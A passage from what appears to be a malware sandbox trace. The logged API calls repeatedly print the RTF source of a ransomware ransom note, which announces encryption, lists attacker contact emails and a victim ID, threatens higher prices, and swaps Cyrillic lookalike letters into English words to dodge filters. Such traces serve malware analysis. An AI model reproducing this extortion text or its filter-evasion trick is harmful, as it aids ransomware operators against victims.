etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 